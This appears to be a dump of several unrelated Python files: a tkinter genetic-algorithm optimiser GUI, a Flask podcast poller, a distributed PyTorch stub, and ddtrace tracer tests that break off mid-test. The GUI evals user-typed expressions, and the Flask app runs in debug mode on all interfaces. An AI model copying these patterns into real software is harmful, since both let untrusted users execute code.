# self.root.columnconfigure(0,weight=1)
# self.root.rowconfigure(8, weight=1)
self.root.configure(bg=self.color)
"""Frames"""
self.top_frame = tk.Frame(
self.root,
width=450,
height=400,
pady=3,
bg=self.color,
relief=tk.RIDGE,
bd=8,
)
self.bot_frame = tk.Frame( # γραφική παράσταση και κάτω
self.root, width=450, height=400, pady=3, bg=self.color,
)
self.inner_frame = tk.Frame( # κάτω από τα sliders
self.top_frame,
width=450,
height=200,
pady=3,
relief=tk.RIDGE,
bd=3,
bg=self.color,
)
"""labels"""
# top_frame
variables_label = tk.Label( # Πεδία Ορισμού
self.top_frame,
text=" Πεδία Ορισμού ",
fg="#000000",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
function_label = tk.Label( # Συνάρτηση
self.top_frame,
text="Συνάρτηση",
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
population_label = tk.Label(
self.top_frame,
text="Πληθυσμός", # Πληθυσμός
fg="#000000",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
generations_label = tk.Label(
self.top_frame, # Γενιές
text="Γενιές",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pm_label = tk.Label( # Π. Μετάλλξης
self.top_frame,
text="Π. Μετάλλαξης",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
pc_label = tk.Label( # Π. Διασταύρωσης
self.top_frame,
text="Π. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
cp_label = tk.Label( # Σημ. Διασταύρωσης
self.top_frame,
text="Σημ. Διασταύρωσης",
fg="black",
font="Courier ",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
bits_label = tk.Label( # bits
self.top_frame,
text="Bits",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
selection_label = tk.Label( # Τελεστής Επιλογής
self.top_frame,
text="Τελεστής Επιλογής",
fg="black",
font="Courier",
bg="#C6BFBB",
relief="raised",
borderwidth=2,
)
self.bounds_label = tk.Label( # label που εμφανίζει ΤΙΚ σε περίπτωση σωστής καταχώρησης πεδίου ορισμού, διαφορετικά Χ
self.top_frame,
text="",
bg=self.color,
)
# top frame - sliders
self.pop_slider = tk.Scale( # πληθυσμός
self.top_frame,
from_=2,
to=500,
resolution=2,
orient="horizontal",
bg=self.color,
)
self.generation_slider = tk.Scale( # Γενιές
self.top_frame,
from_=2,
to=1000,
resolution=1,
orient="horizontal",
bg=self.color,
)
self.pm_slider = tk.Scale( # π. διασταύρωσης
self.top_frame,
from_=0,
to=1,
resolution=0.001,
orient="horizontal",
bg=self.color,
)
self.pc_slider = tk.Scale( # π. μετάλλαξης
self.top_frame,
from_=0,
to=1,
resolution=0.01,
orient="horizontal",
bg=self.color,
)
self.bits_slider = tk.Scale( # bits
self.top_frame,
from_=2,
to=40,
resolution=1,
orient="horizontal",
command=self.update_scale,
bg=self.color,
)
self.cp_slider = tk.Scale( # σημ. διαστάυρωσης
self.top_frame,
from_=1,
to=self.bits_slider.get(),
resolution=1,
orient="horizontal",
bg=self.color,
)
###################################################################################################################
################################## DROPDOWN ###################################################################
###################################################################################################################
# top frame - dropdowns
self.bounds_var = tk.StringVar(self.top_frame) #μεταβλητή δευτέρου dropdown-menu, (x,y,z)
self.bounds_input = tk.StringVar() #εισαχθέντα από τον χρήστη πεδία ορισμού
self.var_number = tk.IntVar() #αριθμός μεταβλητών - πρώτο dropdown-menu
self.function_entry = tk.StringVar() #είσοδος συνάρτησης
self.radio_var = tk.IntVar() #μεταβλητή τελεστή επιλογής
self.choices = {
"x": "0,10",
"y": "0,20",
"z": "0,30"
}
self.option = tk.OptionMenu(self.top_frame, self.bounds_var, *self.choices)
self.option2 = tk.OptionMenu(self.top_frame, self.var_number, *[*range(1,4)],command=self.set_vars )
# function
self.function = ttk.Combobox(self.top_frame, textvariable=self.function_entry,width=35,height=10)
self.func_dict = {
'Beale function':'(1.5-x+x*y)**2+(2.25-x+x*y**2)**2+(2.625-x+x*y**3)**2',
'Booth function':'(x+2*y-7)**2 +(2*x +y -5)**2',
'Matyas function':'0.26*(x**2+y**2)-0.48*x*y',
'Himmelblau\'s function':'(x**2+y-11)**2 + (x+y**2-7)**2',
'Three-hump camel function':'2*x**2-1.05*x**4+x**6/6+x*y+y**2',
'project function':'x**2 + y**3 + z**4 + x*y*z'
}
#adding combobox drop down list
self.function['values']=list(self.func_dict.keys())
self.function.bind("<<ComboboxSelected>>",self.boxcallbackFunc)
# bounds
self.vars_entry = tk.Entry(
self.top_frame, width=10, font="Courier", text=self.bounds_input, justify='center'
)
self.vars_entry.bind("<Return>", self.bind_func)
# radio buttons
self.tourn_button = tk.Radiobutton(
self.top_frame, bg=self.color, text="Tournament", variable=self.radio_var, value=1
)
self.roulette_button = tk.Radiobutton(
self.top_frame,
bg=self.color,
text="Roulette wheel",
variable=self.radio_var,
value=2,
)
###################################################################################################################
# inner frame
cur_label = tk.Label( # Τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label = tk.Label( # best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
gener_label = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
best_label = tk.Label( # Best fitness
self.inner_frame,
text="Best Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
average_label = tk.Label( # Average fitness
self.inner_frame,
text="Average Fitness",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
gener_label2 = tk.Label( # Γενιά
self.inner_frame,
text=" Γενιά ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x0 = tk.Label( # x
self.inner_frame,
text="x",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x1 = tk.Label( # y
self.inner_frame,
text="y",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
x2 = tk.Label( # z
self.inner_frame,
text=" z ",
fg="black",
font="Courier",
bg="#C0C0C0",
relief="raised",
borderwidth=2,
)
cur_label2 = tk.Label( # τρέχων
self.inner_frame,
text="Τρέχων",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
bestest_label2 = tk.Label( # Best
self.inner_frame,
text=" Best ",
fg="white",
font="Courier",
bg="#343434",
relief="raised",
borderwidth=2,
)
self.gener_output = tk.Label( # Output Τρέχων - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_output = tk.Label( # Output τρέχων - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.avg_output = tk.Label( # Output τρέχων - average fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_gen_output = tk.Label( # output Best - Γενιά
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_sol_output = tk.Label( # output Best - Best Fitness
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.gener2_output = tk.Label( # output Τρέχων - Γενιά (δεύτερο μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x0_output = tk.Label( # output Τρέχων - X
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x1_output = tk.Label( # output Τρέχων - Y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x2_output = tk.Label( # output Τρέχων - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.x_outputs =[self.x0_output, self.x1_output, self.x2_output]
self.best_gener2_output = tk.Label( # output Best - Γενιά (κάτω μπλοκ)
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x0_output = tk.Label( # output Best - x
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x1_output = tk.Label( # output Best - y
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.best_x2_output = tk.Label( # output Best - z
self.inner_frame,
text="",
fg="black",
font="Courier",
bg=self.color,
)
self.bestx_output =[self.best_x0_output, self.best_x1_output, self.best_x2_output]
# bottom frame
self.maximize_button = tk.Button( # maximize button
self.bot_frame,
text="maximize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.maximize).start(),
relief='ridge'
)
self.minimize_button = tk.Button( # minimize button
self.bot_frame,
text="minimize",
width=10,
font="Courier 14",
command=lambda: threading.Thread(target=self.minimize).start(),
relief='ridge'
)
exit_button = tk.Button( # exit butotn
self.bot_frame,
text="exit",
width=10,
font="Courier 14",
command=self.root.destroy,
relief='ridge'
)
# canvas
self.fig = plt.Figure(figsize=(7, 4), dpi=100, facecolor="#efebe9")
self.canvas = FigureCanvasTkAgg( # plot
self.fig,
master=self.bot_frame,
)
self.axes = self.fig.add_subplot(111)
############################################################################################################
###################################### GRIDS ############################################################
############################################################################################################
'''grids'''
# frames
self.inner_frame.grid(row=7, columnspan=5, sticky="nsew")
self.top_frame.grid(row=0)
self.bot_frame.grid(row=1)
self.inner_frame.columnconfigure(2, weight=3)
# top frame
variables_label.grid(row=0, column=0, sticky="nsew") # dropdown αριθμός μεταβλητών
generations_label.grid(row=4, column=0, sticky="nsew") # Γενιές label
population_label.grid(row=0, column=1, sticky="nsew") # Πληθυσμός label
cp_label.grid(row=0, column=2, sticky="nsew") # Σημ. Διασταύρωσης label
function_label.grid(row=2, column=0, sticky="nsew") # Συνάρτηση label
pc_label.grid(row=2, column=1, sticky="nsew") # Π. Διασταύρωσης label
bits_label.grid(row=2, column=2, sticky="nsew") # Bits label
pm_label.grid(row=4, column=1, sticky="nsew") # Π. Μετάλλαξης label
selection_label.grid(row=4, column=2, sticky="nsew") # Τελεστής επιλογής label
self.bounds_label.grid(row=1, column=0,sticky=tk.E ) # ΤΙΚ / Χ label
# inner
cur_label.grid(row=1, column=0) # Τρέχων label (πρώτο μπλοκ)
bestest_label.grid(row=2, column=0) # Best label (πρώτο μπλοκ)
gener_label.grid(row=0, column=1) # Γενιά label (πρώτο μπλοκ)
best_label.grid(row=0, column=2) # Best Fitness label
average_label.grid(row=0, column=3, columnspan=2, sticky="nsew") # Average fitness label
gener_label2.grid(row=3, column=1) # Γενιά label (δεύτερο μπλοκ)
x0.grid(row=3, column=2, sticky="nsew") # x label (δεύτερο μπλοκ)
x1.grid(row=3, column=3, columnspan=2, sticky="nsew") # y label (δεύτερο μπλοκ)
x2.grid(row=3, column=5,sticky='nsew',columnspan=3) # z label (δεύτερο μπλοκ)
cur_label2.grid(row=4, column=0) # Τρέχων label (δεύτερο μπλοκ)
bestest_label2.grid(row=5, column=0) # Best label (δεύτερο μπλοκ)
# outputs
self.gener_output.grid(row=1, column=1) # Τρέχων - γενιά, output (πρώτο μπλοκ)
self.best_output.grid(row=1, column=2) # Τρέχων - Best Fitness, output (πρώτο μπλοκ)
self.avg_output.grid(row=1, column=3) # Τρέχων - Average Fitness, output (πρώτο μπλοκ)
self.best_gen_output.grid(row=2, column=1) # Best -Γενιά, output (πρώτο μπλοκ)
self.best_sol_output.grid(row=2, column=2) # Best - Best Fitness, output (πρώτο μπλοκ)
self.gener2_output.grid(row=4, column=1) # Τρέχων - Γενιά, output (δεύτερο μπλοκ)
self.x0_output.grid(row=4, column=2) # Τρέχων - X output (δεύτερο μπλοκ)
self.x1_output.grid(row=4, column=3) # Τρέχων - Y output (δεύτερο μπλοκ)
self.x2_output.grid(row=4, column=5) # Τρέχων - Z output (δεύτερο μπλοκ)
self.best_gener2_output.grid(row=5, column=1) # Best - Γενιά, output (δεύτερο μπλοκ)
self.best_x0_output.grid(row=5, column=2) # Best - X, output (δεύτερο μπλοκ)
self.best_x1_output.grid(row=5, column=3) # Best - Y, output (δεύτερο μπλοκ)
self.best_x2_output.grid(row=5, column=5) # Best - Z, output (δεύτερο μπλοκ)
# sliders
self.pop_slider.grid(row=1, column=1,sticky='nsew') # πληθυσμός
self.generation_slider.grid(row=5, column=0,sticky='nsew') # γενιές
self.pm_slider.grid(row=5, column=1,sticky='nsew') # π. μετάλλαξης
self.pc_slider.grid(row=3, column=1,sticky='nsew') # π. διασταύρωσης
self.bits_slider.grid(row=3, column=2,) # bits
self.cp_slider.grid(row=1, column=2,) # σημ. διασταύρωσης
# dropdown bounds
self.option.grid(row=1, column=0,padx=(0,50) ) # Πεδία ορισμού δεύτερο dropdown-menu (x,y,z)
self.option2.grid(row=1, column=0, sticky=tk.W) # Πεδία ορισμού πρώτο dropdown-menu (1,2,3)
# function entry
self.function.grid(row=3, column=0,) # συνάρτηση
#bounds entry
self.vars_entry.grid(row=1, column=0, padx=(110,0)) # Πεδία ορισμού - Είσοδος πεδίων όρισμού
# buttons
self.maximize_button.grid(row=2, column=0, sticky=tk.W) # maximize
self.minimize_button.grid(row=2, column=1) # minimize
exit_button.grid(row=2, column=2, sticky=tk.E) # exit
# radio buttons
self.tourn_button.grid(row=5, column=2) # radio - tournament
self.roulette_button.grid(row=6, column=2) # radio - roulette wheel
# canvas
self.canvas.get_tk_widget().grid(row=0, column=0, columnspan=3) # graph
"""αρχικοποίηση τιμών"""
self.pop_slider.set(100)
self.generation_slider.set(150)
self.pm_slider.set(0.01)
self.pc_slider.set(0.8)
self.bits_slider.set(30)
self.var_number.set(3)
self.bounds_input.set("0,10")
self.radio_var.set(1)
self.bounds_var.set(list(self.choices.keys())[0])
self.function.set("x**2 + y**3 + z**4 + x*y*z")
"""traced var"""
self.bounds_var.trace("w", self.bounds_f)
"""mainloop"""
self.root.mainloop()
#
def set_vars(self,event):
"""
καθορίζει τον αριθμό των μεταβλητών,
ενημερώνει ανάλογα το dropdown menu των μεταβλητών x-y-z
"""
menu = self.option.children["menu"]
menu.delete(0,"end")
n = self.var_number.get()
t=['x','y','z']
t=[t[i] for i in range(n)]
#initializes bounds
self.choices = dict(zip(t,["-10,10"]*n))
#creates the second drop down menu
for val in self.choices.keys():
menu.add_command(label=val, command=tk._setit(self.bounds_var,val))
self.bounds_var.set(list(self.choices.keys())[0])
def boxcallbackFunc(self,event):
"""
τοποθετεί σαν input το value του λεξικού έτοιμων συναρτήσεων
https://www.etutorialspoint.com/index.php/347-python-tkinter-ttk-combobox-event-binding
"""
self.function = event.widget.get()
self.function_entry.set(self.func_dict[self.function])
def bind_func(self, event):
"""
στο <enter> εμφανίζει κατάλληλο μήνυμα για αποδοχή ή όχι των πεδίων ορισμού,
παράλληλα ενημερώνει το λεξικό self.choices με τα αποδεκτά πεδία ορισμού
"""
if not self.mk_int(self.vars_entry.get()):
self.bounds_label.config(text="❌", font="Courier", fg="red")
else:
self.bounds_label.config(text="✓", font="Courier", fg="green")
self.choices[self.bounds_var.get()] = self.vars_entry.get()
def bounds_f(self, *args):
"""trace var method"""
var2_ = self.choices[self.bounds_var.get()]
self.bounds_input.set(var2_)
self.bounds_label.config(text="")
def update_scale(self, new_max):
"""configures slider's max val"""
self.cp_slider.configure(to=int(new_max) - 1)
@staticmethod
def mk_int(s):
"""επιστρέφει True αν τα πεδία ορισμού είναι αποδεκτά, διαφορετικά False"""
try:
x, y = s.split(",")
if int(x) >= int(y):
raise ValueError
return True
except ValueError:
return False
def extract_bounds(self, dict) -> list:
"""
επιστρέφει τα πεδία ορισμού σε μορφή λίστας
"""
return [list(map(int, dict[val].split(","))) for val in dict if dict[val] != ""]
def graph(self, y1, y2):
"""plots"""
self.fig.clear()
self.axes = self.fig.add_subplot(111)
self.axes.plot(y1, "g", label="average fitness")
self.axes.plot(y2, "r", label="max fitness")
self.axes.set_ylabel("fitness")
self.axes.set_xlabel("generations")
self.axes.yaxis.set_label_position("right")
# legend options
self.axes.legend(
bbox_to_anchor=(0.5, 1.1),
loc="upper center",
ncol=2,
fancybox=True,
shadow=True,
)
# forces integer spacing between generations
self.axes.xaxis.set_major_locator(MaxNLocator(integer=True))
self.canvas.draw()
def minimize(self):
'''minimize button'''
self.objective_function = f"-1*({self.function_entry.get()})"
self.run()
def maximize(self):
'''maximize button'''
self.objective_function = self.function_entry.get()
self.run()
def dreamcatcher(self):
"""tries to catch exceptions a man can only dream of"""
try:
self.bounds = self.extract_bounds(self.choices)
if not any(k in self.objective_function for k in list(self.choices.keys())):
raise Exception("Καμία μεταβλητή")
for key in self.choices.keys():
if self.choices[key] == "" and key in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
for key in self.choices.keys():
if self.choices[key] != "" and key not in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
self.generations = self.generation_slider.get()
ga = GeneticAlgorithm(
self.pop_slider.get(),
self.bits_slider.get(),
self.bounds,
self.pm_slider.get(),
self.pc_slider.get(),
self.cp_slider.get(),
eval("lambda x=0,y=0,z=0:" + self.objective_function),
)
return ga
except Exception as e:
print(e)
return
def run_helper(self,n,ga,output):
for i in range(n):
output[i].configure(text='{:.2f}'.format(ga.best().real_genes[i]))
def clear_outputs(self):
"""καθαριζει τα πεδια εξοδου"""
self.gener_output.configure(text="")
self.x0_output.configure(text="")
self.x1_output.configure(text="")
self.x2_output.configure(text="")
self.best_x0_output.configure(text="")
self.best_x1_output.configure(text="")
self.best_x2_output.configure(text="")
def run(self):
"""run buttom"""
ga = self.dreamcatcher()
if ga:
self.clear_outputs()
ga.run(self.radio_var.get())
b = [ga.best().fitness]
a = [ga.fitness_average]
self.best = b[0]
self.best_index = 1
for i in range(1, self.generations):
self.run_helper(len(self.bounds),ga,self.x_outputs)
self.gener_output.configure(text=i + 1)
self.gener2_output.configure(text=i + 1)
ga.run(self.radio_var.get())
b.append(ga.best().fitness)
self.best_output.configure(text=float("{:.2f}".format(b[i])))
a.append(ga.fitness_average)
self.avg_output.configure(text=float("{:.2f}".format(a[i])))
if self.best < ga.best().fitness:
self.best = ga.best().fitness
self.best_index = i + 1
self.best_sol_output.configure(text=float("{:.2f}".format(self.best)))
self.best_gen_output.configure(text=self.best_index)
self.best_gener2_output.configure(text=self.best_index)
self.run_helper(len(self.bounds), ga, self.bestx_output)
self.graph(a, b)
self.fig.clear()
def main():
root = tk.Tk()
window = MainWindow(root, "#efebe9")
main()
|
app.py
|
# OVERALL IMPORTS
from flask import Flask, request
from threading import Thread
import schedule
import time
import os
import pdb
import json
# PODCAST IMPORTS
from podcasts.series_driver import SeriesDriver
from podcasts.episodes_driver import EpisodesDriver
from podcasts.site_crawler import SiteCrawler
from utils.couchbase_storer import CouchbaseStorer
from utils.series_patcher import SeriesPatcher
from utils.constants import *
from utils.thread_pool import *
import utils.log
# Flask App
app = Flask(__name__)
logger = utils.log.logger
patcher = SeriesPatcher("lol")
def digest_podcasts():
"""
Digest most popular podcasts from
iTunes on a daily-basis
"""
# Grab all series first
SeriesDriver(BASE_DIR).get_series_from_urls(SiteCrawler().all_urls())
storer = \
(CouchbaseStorer(PODCASTS_BUCKET_URL)
if PODCASTS_BUCKET_PASSWORD == ''
else CouchbaseStorer(PODCASTS_BUCKET_URL, PODCASTS_BUCKET_PASSWORD))
# Grab all episodes once we have data stored
EpisodesDriver(DIRECTORY, storer).eps_from_series()
def start_rss_polling():
"""
Create a thread pool and a job queue to check the rss feeds of every series
in the podcasts bucket.
"""
logger.info("Starting RSS polling with {} threads and job queue of size {}".format(NUM_RSS_THREADS, JOB_QUEUE_SIZE))
thread_pool = ThreadPool(NUM_RSS_THREADS, JOB_QUEUE_SIZE)
limit = 100
offset = 0
for i in range(NUM_RSS_THREADS):
series_list = patcher.get_series_with_limit(limit, offset)
rss_feed_tups = patcher.create_rss_feed_tups(series_list)
args = (rss_feed_tups, CHECK_TIMESTAMP)
thread_pool.add_task(patcher.patch_multiple, args)
offset += limit
thread_pool.wait_for_all()
def run_schedule():
"""
Check schedule and run pending
"""
while 1:
schedule.run_pending()
time.sleep(1)
@app.route('/refresh/<series_id>')
def refresh(series_id):
"""
Params:
series_id [int] - id for the series as designated by apple
Returns:
JSON object with keys "success" (either 0 or 1) and "episode"
that contains the entire episode object.
Given a series_id, checks to see if we should request apple
to get new episodes. If there are new episodes, returns the new episode object.
"""
episode = {"series_id": series_id, "episode-id": 420, "description":"testing"}
response = {"success": 0, "episode": episode}
return json.dumps(response)
if __name__ == '__main__':
# schedule.every(ONE_DAY).seconds.do(digest_podcasts)
# schedule.every(15*MINUTES).seconds.do(start_rss_polling)
# t = Thread(target=run_schedule)
# t.start()
# start_rss_polling()
app.run(debug=True, host='0.0.0.0', port=5000, use_reloader=False)
|
mnist1n2g.py
|
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.utils.data
import torch.utils.data.distributed
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
def run(rank, size):
""" Distributed function to be implemented later. """
pass
def init_processes(rank, size, fn, backend='tcp'):
""" Initialize the distributed environment. """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
p = Process(target=init_processes, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_tracer.py
|
import time
import mock
import opentracing
from opentracing import Format
from opentracing import InvalidCarrierException
from opentracing import SpanContextCorruptedException
from opentracing import UnsupportedFormatException
from opentracing import child_of
import pytest
import ddtrace
from ddtrace.ext.priority import AUTO_KEEP
from ddtrace.opentracer import Tracer
from ddtrace.opentracer import set_global_tracer
from ddtrace.opentracer.span_context import SpanContext
from ddtrace.propagation.http import HTTP_HEADER_TRACE_ID
from ddtrace.settings import ConfigException
class TestTracerConfig(object):
def test_config(self):
"""Test the configuration of the tracer"""
config = {"enabled": True}
tracer = Tracer(service_name="myservice", config=config)
assert tracer._service_name == "myservice"
assert tracer._enabled is True
def test_no_service_name(self):
"""A service_name should be generated if one is not provided."""
tracer = Tracer()
assert tracer._service_name == "pytest"
def test_multiple_tracer_configs(self):
"""Ensure that a tracer config is a copy of the passed config."""
config = {"enabled": True}
tracer1 = Tracer(service_name="serv1", config=config)
assert tracer1._service_name == "serv1"
config["enabled"] = False
tracer2 = Tracer(service_name="serv2", config=config)
# Ensure tracer1's config was not mutated
assert tracer1._service_name == "serv1"
assert tracer1._enabled is True
assert tracer2._service_name == "serv2"
assert tracer2._enabled is False
def test_invalid_config_key(self):
"""A config with an invalid key should raise a ConfigException."""
config = {"enabeld": False}
# No debug flag should not raise an error
tracer = Tracer(service_name="mysvc", config=config)
# With debug flag should raise an error
config["debug"] = True
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(config=config)
assert "enabeld" in str(ce_info)
assert tracer is not None
# Test with multiple incorrect keys
config["setttings"] = {}
with pytest.raises(ConfigException) as ce_info:
tracer = Tracer(service_name="mysvc", config=config)
assert ["enabeld", "setttings"] in str(ce_info)
assert tracer is not None
def test_global_tags(self):
"""Global tags should be passed from the opentracer to the tracer."""
config = {
"global_tags": {
"tag1": "value1",
"tag2": 2,
},
}
tracer = Tracer(service_name="mysvc", config=config)
with tracer.start_span("myop") as span:
# global tags should be attached to generated all datadog spans
assert span._dd_span.get_tag("tag1") == "value1"
assert span._dd_span.get_metric("tag2") == 2
with tracer.start_span("myop2") as span2:
assert span2._dd_span.get_tag("tag1") == "value1"
assert span2._dd_span.get_metric("tag2") == 2
class TestTracer(object):
def test_start_span(self, ot_tracer, test_spans):
"""Start and finish a span."""
with ot_tracer.start_span("myop") as span:
pass
# span should be finished when the context manager exits
assert span.finished
spans = test_spans.get_spans()
assert len(spans) == 1
def test_start_span_references(self, ot_tracer, test_spans):
"""Start a span using references."""
with ot_tracer.start_span("one", references=[child_of()]):
pass
spans = test_spans.pop()
assert spans[0].parent_id is None
root = ot_tracer.start_active_span("root")
# create a child using a parent reference that is not the context parent
with ot_tracer.start_active_span("one"):
with ot_tracer.start_active_span("two", references=[child_of(root.span)]):
pass
root.close()
spans = test_spans.pop()
assert spans[1].parent_id == spans[0].span_id
assert spans[2].parent_id == spans[0].span_id
def test_start_span_custom_start_time(self, ot_tracer):
"""Start a span with a custom start time."""
t = 100
with mock.patch("ddtrace.span.time_ns") as time:
time.return_value = 102 * 1e9
with ot_tracer.start_span("myop", start_time=t) as span:
pass
assert span._dd_span.start == t
assert span._dd_span.duration == 2
def test_start_span_with_spancontext(self, ot_tracer, test_spans):
"""Start and finish a span using a span context as the child_of
reference.
"""
with ot_tracer.start_span("myop") as span:
with ot_tracer.start_span("myop", child_of=span.context) as span2:
pass
# span should be finished when the context manager exits
assert span.finished
assert span2.finished
spans = test_spans.pop()
assert len(spans) == 2
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
def test_start_span_with_tags(self, ot_tracer):
"""Create a span with initial tags."""
tags = {"key": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
assert span._dd_span.get_tag("key") == "value"
assert span._dd_span.get_tag("key2") == "value2"
def test_start_span_with_resource_name_tag(self, ot_tracer):
"""Create a span with the tag to set the resource name"""
tags = {"resource.name": "value", "key2": "value2"}
with ot_tracer.start_span("myop", tags=tags) as span:
pass
# Span resource name should be set to tag value, and should not get set as
# a tag on the underlying span.
assert span._dd_span.resource == "value"
assert span._dd_span.get_tag("resource.name") is None
# Other tags are set as normal
assert span._dd_span.get_tag("key2") == "value2"
def test_start_active_span_multi_child(self, ot_tracer, test_spans):
"""Start and finish multiple child spans.
This should ensure that child spans can be created 2 levels deep.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[1].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007 + 0.005
assert spans[2].duration >= 0.005
def test_start_active_span_multi_child_siblings(self, ot_tracer, test_spans):
"""Start and finish multiple span at the same level.
This should test to ensure a parent can have multiple child spans at the
same level.
"""
with ot_tracer.start_active_span("myfirstop") as scope1:
time.sleep(0.009)
with ot_tracer.start_active_span("mysecondop") as scope2:
time.sleep(0.007)
with ot_tracer.start_active_span("mythirdop") as scope3:
time.sleep(0.005)
# spans should be finished when the context manager exits
assert scope1.span.finished
assert scope2.span.finished
assert scope3.span.finished
spans = test_spans.pop()
# check spans are captured in the trace
assert scope1.span._dd_span is spans[0]
assert scope2.span._dd_span is spans[1]
assert scope3.span._dd_span is spans[2]
# ensure proper parenting
assert spans[1].parent_id is spans[0].span_id
assert spans[2].parent_id is spans[0].span_id
# sanity check a lower bound on the durations
assert spans[0].duration >= 0.009 + 0.007 + 0.005
assert spans[1].duration >= 0.007
assert spans[2].duration >= 0.005
def test_start_span_manual_child_of(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
root = ot_tracer.start_span("zero")
with ot_tracer.start_span("one", child_of=root):
with ot_tracer.start_span("two", child_of=root):
with ot_tracer.start_span("three", child_of=root):
pass
root.finish()
spans = test_spans.pop()
assert spans[0].parent_id is None
# ensure each child span is a child of root
assert spans[1].parent_id is root._dd_span.span_id
assert spans[2].parent_id is root._dd_span.span_id
assert spans[3].parent_id is root._dd_span.span_id
assert spans[0].trace_id == spans[1].trace_id and spans[1].trace_id == spans[2].trace_id
def test_start_span_no_active_span(self, ot_tracer, test_spans):
"""Start spans without using a scope manager.
Spans should be created without parents since there will be no call
for the active span.
"""
with ot_tracer.start_span("one", ignore_active_span=True):
with ot_tracer.start_span("two", ignore_active_span=True):
pass
with ot_tracer.start_span("three", ignore_active_span=True):
pass
spans = test_spans.pop()
# ensure each span does not have a parent
assert spans[0].parent_id is None
assert spans[1].parent_id is None
assert spans[2].parent_id is None
# and that each span is a new trace
assert (
spans[0].trace_id != spans[1].trace_id
and spans[1].trace_id != spans[2].trace_id
and spans[0].trace_id != spans[2].trace_id
)
def test_start_active_span_child_finish_after_parent(self, ot_tracer, test_spans):
"""Start a child span and finish it after its parent."""
span1 = ot_tracer.start_active_span("one").span
span2 = ot_tracer.start_active_span("two").span
span1.finish()
time.sleep(0.005)
span2.finish()
spans = test_spans.pop()
assert len(spans) == 2
assert spans[0].parent_id is None
assert spans[1].parent_id is span1._dd_span.span_id
assert spans[1].duration > spans[0].duration
def test_start_span_multi_intertwined(self, ot_tracer, test_spans):
"""Start multiple spans at the top level intertwined.
Alternate calling between two traces.
"""
import threading
# synchronize threads with a threading event object
event = threading.Event()
def trace_one():
_id = 11
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
event.set()
def trace_two():
_id = 21
event.wait()
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
_id += 1
with ot_tracer.start_active_span(str(_id)):
pass
# the ordering should be
